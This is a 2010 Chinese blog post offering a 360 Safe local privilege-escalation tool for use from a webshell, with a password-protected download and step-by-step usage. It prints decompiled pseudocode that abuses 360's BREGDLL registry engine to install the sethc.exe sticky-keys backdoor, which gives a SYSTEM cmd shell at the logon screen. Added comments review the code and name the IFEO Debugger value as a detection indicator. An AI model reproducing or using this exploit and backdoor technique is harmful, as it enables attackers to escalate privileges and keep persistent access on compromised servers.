360本地提权(Webshell下用)
发布:admin | 发布时间: 2010年2月3日作者: friddy
在webshell下运行360test.exe
成功后,3389到服务器,按5下shift,得到一个cmd
附件地址:360up.rar
密码friddy
样本没有加壳,直接用 Hex-Rays(F5)反编译即可。从下面的伪代码看,它先通过 HKLM\...\App Paths\360safe.exe 的 Path 值找到 360 的安装目录,加载 deepscan\BREGDLL.dll,取出 InitRegEngine / BRegOpenKey / BRegCreateKeyEx / BRegSetValueEx 等导出函数,然后用这套注册表引擎(而不是 Win32 的 Reg* API)在 HKLM\...\Image File Execution Options\sethc.exe 下写入 Debugger = c:\windows\system32\cmd.exe,也就是所谓的 shift(粘滞键)后门。"提权"点推测在于 BREGDLL 自带的注册表引擎对 HKLM 的写入不受调用者权限(ACL)约束,文中并未给出验证;对防守方来说,IFEO\sethc.exe 下出现 Debugger 值本身就是明确的检测指标。
有码有真相:
// Hex-Rays (IDA "F5") pseudocode of the loader routine in the sample.
// The "NN " prefix on each line is the blog's listing number, not code.
//
// What the code shows: read 360safe's install directory from
// HKLM\Software\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe\Path,
// append "\deepscan\BREGDLL.dll", LoadLibrary it, resolve the BReg* exports
// into file-level globals (BRegDeleteKey, BRegOpenKey, BRegCloseKey,
// BRegSetValueEx, BRegCreateKeyEx — defined outside this listing and used
// by sub_401170), and call InitRegEngine().
// Returns 1 when every export resolved and InitRegEngine() returned
// non-zero; otherwise 0, after FreeLibrary() if the DLL had been loaded.
//
// NOTE(review): both registry status checks use ">= 0". Win32 LSTATUS
// error codes (e.g. ERROR_FILE_NOT_FOUND == 2) are positive, so these
// tests only reject negative values and do not detect failure; the
// LoadLibraryA NULL check is the guard that actually matters below.
01 signed int __cdecl sub_401000()
02 {
03 signed int v0; // ecx@3
04 char *v1; // edi@3
05 signed int v2; // ecx@7
06 unsigned int v3; // ebx@7
07 BYTE *v4; // edi@7
08 const void *v5; // esi@7
09 HMODULE v6; // eax@11
10 HMODULE v7; // esi@11
11 FARPROC v8; // eax@12
12 int (*v9)(void); // ebx@12
13 LSTATUS v11; // esi@2
14 char v12; // zf@5
15 signed int v13; // ecx@7
16 char v14; // zf@9
// LibFileName, v17, v18 and v19 are one contiguous stack buffer:
// [bp-124h] .. [bp-1h] = 0x124 (292) bytes, per the frame offsets.
17 BYTE LibFileName; // [sp+18h] [bp-124h]@1
18 DWORD cbData; // [sp+10h] [bp-12Ch]@1
19 char v17; // [sp+19h] [bp-123h]@1
20 __int16 v18; // [sp+139h] [bp-3h]@1
21 char v19; // [sp+13Bh] [bp-1h]@1
22 HKEY hKey; // [sp+Ch] [bp-130h]@1
23 DWORD Type; // [sp+14h] [bp-128h]@2
24
// Zero the whole path buffer, so whatever RegQueryValueExA writes
// (at most cbData == 260 bytes) is followed by a NUL terminator.
25 LibFileName = 0;
26 cbData = 260;
27 memset(&v17, 0, 0x120u);
28 v18 = 0;
29 v19 = 0;
30 if ( RegOpenKeyA(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360safe.exe", &hKey) >= 0 )
31 {
// Type is an out-parameter (lpType); it is preset to 1 (REG_SZ) but the
// value returned by the API is never checked afterwards.
32 Type = 1;
33 v11 = RegQueryValueExA(hKey, "Path", 0, &Type, &LibFileName, &cbData);
34 RegCloseKey(hKey);
35 if ( v11 >= 0 )
36 {
// Inlined strlen (repne scasb) over the DLL suffix: v0 starts at -1 and is
// decremented once per byte including the NUL, so afterwards ~v0 is
// strlen(suffix) + 1 and v1 points one past the NUL.
37 v1 = "\\deepscan\\BREGDLL.dll";
38 v0 = -1;
39 do
40 {
41 if ( !v0 )
42 break;
43 v12 = *v1++ == 0;
44 --v0;
45 }
46 while ( !v12 );
// v13 = byte count of the suffix incl. NUL (22); v5 = start of the suffix.
47 v13 = ~v0;
48 v5 = &v1[-v13];
49 v3 = v13;
// Inlined strlen over LibFileName: leaves v4 one past its NUL.
50 v4 = &LibFileName;
51 v2 = -1;
52 do
53 {
54 if ( !v2 )
55 break;
56 v14 = *v4++ == 0;
57 --v2;
58 }
59 while ( !v14 );
// v4 - 1 is LibFileName's NUL, so this is strcat(LibFileName, suffix).
// Worst case 260 + 22 = 282 bytes, which fits the 292-byte buffer.
60 memcpy(v4 - 1, v5, v3);
// Load <360 install dir>\deepscan\BREGDLL.dll from 360's own directory.
61 v6 = LoadLibraryA((const CHAR *)&LibFileName);
62 v7 = v6;
63 if ( v6 )
64 {
// Resolve the registry-engine exports into the file-level globals.
65 v9 = (int (*)(void))GetProcAddress(v6, "InitRegEngine");
66 BRegDeleteKey = (int)GetProcAddress(v7, "BRegDeleteKey");
67 BRegOpenKey = (int (__stdcall *)(_DWORD, _DWORD, _DWORD))GetProcAddress(v7, "BRegOpenKey");
68 BRegCloseKey = (int (__stdcall *)(_DWORD))GetProcAddress(v7, "BRegCloseKey");
69 BRegSetValueEx = (int (__stdcall *)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD))GetProcAddress(
70 v7,
71 "BRegSetValueEx");
72 v8 = GetProcAddress(v7, "BRegCreateKeyEx");
73 BRegCreateKeyEx = (int (__stdcall *)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD))v8;
// Success only if every export resolved AND InitRegEngine() returned
// non-zero; the DLL stays loaded in that case (the globals point into it).
74 if ( v9 && BRegDeleteKey && BRegOpenKey && BRegCloseKey && BRegSetValueEx && v8 && v9() )
75 return 1;
// Any miss: unload the DLL. The globals are left holding stale values.
76 FreeLibrary(v7);
77 }
78 }
79 }
80 return 0;
81 }
// Hex-Rays pseudocode of the payload routine: installs the sethc.exe
// ("sticky keys") Image File Execution Options backdoor through the BReg*
// globals resolved by sub_401000, i.e. via BREGDLL's registry engine rather
// than the Win32 Reg* API. The "NN " prefix on each line is the blog's
// listing number, not code.
//
// a1: initial contents of the key-handle slot (v3); overwritten by
//     BRegOpenKey / BRegCreateKeyEx.
// Returns the BRegSetValueEx status when the open check passed, otherwise
// the BRegOpenKey status.
//
// Constants as written: -2147483646 == 0x80000002 == HKEY_LOCAL_MACHINE.
// For BRegSetValueEx, 1 is REG_SZ and 28 == sizeof("c:\\windows\\system32\\cmd.exe")
// (27 chars + NUL). If BRegCreateKeyEx mirrors RegCreateKeyExA's signature,
// 983103 == 0xF003F is KEY_ALL_ACCESS and the preceding 1 would be
// REG_OPTION_VOLATILE — TODO confirm against the DLL's actual prototype.
//
// NOTE(review): "result >= 0" has the same weakness as in sub_401000 —
// positive error codes pass — which here means a missing key still falls
// through to BRegCreateKeyEx, so the routine behaves as create-or-open.
// BRegCreateKeyEx's return is not checked before v3 is used, and the handle
// from BRegOpenKey is overwritten without a BRegCloseKey (a leak, if BReg
// handles need closing — unverified).
// Detection: a Debugger value under IFEO\sethc.exe is the indicator to
// alert on.
01 int __fastcall sub_401170(int a1)
02 {
03 int result; // eax@1
04 int v2; // esi@2
05 int v3; // [sp+48h] [bp-4h]@1
06
07 v3 = a1;
// Open HKLM\...\Image File Execution Options\sethc.exe.
08 result = BRegOpenKey(
09 -2147483646,
10 "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe",
11 &v3);
12 if ( result >= 0 )
13 {
// (Re)create the same key; v3 receives the new handle.
14 BRegCreateKeyEx(
15 -2147483646,
16 "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe",
17 0,
18 0,
19 1,
20 983103,
21 0,
22 &v3,
23 0);
// Debugger = "c:\windows\system32\cmd.exe": Windows launches this instead
// of sethc.exe, so pressing Shift five times at the logon screen spawns cmd.
24 v2 = BRegSetValueEx(v3, "debugger", 0, 1, "c:\\windows\\system32\\cmd.exe", 28);
25 BRegCloseKey(v3);
26 result = v2;
27 }
28 return result;
29 }
文章如转载,请注明转载自:http://www.5iadmin.com/post/218.html